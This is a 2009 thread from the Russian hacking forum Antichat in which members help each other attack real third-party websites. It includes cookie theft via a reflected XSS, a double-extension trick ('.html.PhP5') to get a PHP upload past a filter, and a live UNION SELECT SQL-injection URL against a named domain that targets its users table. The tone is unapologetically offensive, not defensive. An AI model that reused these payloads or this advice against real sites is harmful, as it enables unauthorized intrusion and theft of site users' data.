Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
30.03.2009, 17:40
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Если вместо 4 подставить 3 или 5 - результат на странице будет совсем другой. Тут blind sql-inj, но вполне работабельный
|
|
|
31.03.2009, 02:08
|
|
Новичок
Регистрация: 16.02.2009
Сообщений: 14
Провел на форуме:
205599
Репутация:
38
|
|
Вечер добрый , вобщем нашёл на одном крупном сайте xss (пассивку). Попытался вывести куки через алерт , и получил :
Код:
<store.**********.com>
undefined
,
Что бы это могло значить ? |
|
|
|
31.03.2009, 09:41
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
Ambassadorik, "undifined" переводится как "не определено", думай что хочешь.
м/б у тебя куки пустые?
|
|
|
|
31.03.2009, 10:04
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Тупо нет куков, т.к. находишься на сайте на правах гостя, хотя есть еще много вариантов...
|
|
|
|
31.03.2009, 12:26
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Сообщение от Ambassadorik
Что бы это могло значить ?
Скорее всего ты в XSS опечатался, например вместо document.cookie написал document.cookies .
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
31.03.2009, 15:37
|
|
Новичок
Регистрация: 16.02.2009
Сообщений: 14
Провел на форуме:
205599
Репутация:
38
|
|
да , точно ...написал document.cookiee
|
|
|
|
31.03.2009, 16:45
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230
Репутация:
462
|
|
Есть доступ в админку, заливаю файл, php файлы не выполняются, а html выполняется.
можно заливать любые файлы. залил пустой .htacess, таже фигня.
подскажите как быть.
|
|
|
|
31.03.2009, 16:52
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
phtml,php3,php5,phps?
но скорее всего не поможет. кинь ссылку, поковырять можно будет.
|
|
|
|
31.03.2009, 18:51
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от ph1l1ster
Есть доступ в админку, заливаю файл, php файлы не выполняются, а html выполняется.
можно заливать любые файлы. залил пустой .htacess, таже фигня.
подскажите как быть.
Воспользуйся плагином для фф (или другим альтернативным способом), перехвати то, что передается серверу... Там может быть, что типо файл только html передается и т.д... =) Еще кстати попробуй так [filename].html.PhP5 - может поможет 
|
|
|
|
31.03.2009, 21:09
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Нашел тут SQL-иньекция и вот очень хочеться раскрутить)
Вот сама иньекия:
Код:
http://www.gnn.tv/videos/video.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+gnn_users--
К сожелению не могу никак подобрать колонки =( Может поможет кто-нить) ? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
